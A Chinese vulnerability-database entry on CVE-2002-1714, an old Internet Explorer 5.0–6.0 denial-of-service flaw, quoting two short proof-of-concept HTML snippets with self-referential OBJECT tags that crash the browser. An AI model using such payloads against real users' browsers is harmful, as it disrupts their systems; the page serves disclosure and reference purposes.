Microsoft Internet Explorer 自指对象服务拒绝漏洞

Microsoft Internet Explorer 自指对象服务拒绝漏洞

漏洞ID 1106695 漏洞类型 其他
发布时间 2002-04-20 更新时间 2005-10-20
图片[1]-Microsoft Internet Explorer 自指对象服务拒绝漏洞-安全小百科CVE编号 CVE-2002-1714
图片[2]-Microsoft Internet Explorer 自指对象服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200212-582
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21404
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-582
|漏洞详情
MicrosoftInternetExplorer5.0至6.0版本存在漏洞。远程攻击者可以借助带有定义包含对象的HTML文件DATA字段,类型为”text/html”的对象导致服务拒绝(崩溃),该漏洞导致无穷递归。
|漏洞EXP
source: http://www.securityfocus.com/bid/4564/info

Microsoft Internet Explorer is vulnerable to a denial of service due to an error in handling certain self-referential <OBJECT> definitions in HTML documents. This occurs when an object of type "text/html" is specified, with the DATA field referencing the name of the HTML document in which it is defined. Other circumstances may also trigger this condition.

Create a file named "CRASH.HTM" with the following line in it:

<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>

The following example was also submitted by Ryan Emerle:

<object id="test"
data="#"
width="100%" height="100%"
type="text/x-scriptlet"
VIEWASTEXT></object>
|参考资料

来源:XF
名称:ie-object-directive-dos(8904)
链接:http://xforce.iss.net/xforce/xfdb/8904
来源:BID
名称:4564
链接:http://www.securityfocus.com/bid/4564

相关推荐: Phorum 5.0.x – ‘FOLLOW.php’ SQL Injection

Phorum 5.0.x – ‘FOLLOW.php’ SQL Injection 漏洞ID 1054745 漏洞类型 发布时间 2004-11-11 更新时间 2004-11-11 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP CVSS评分…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享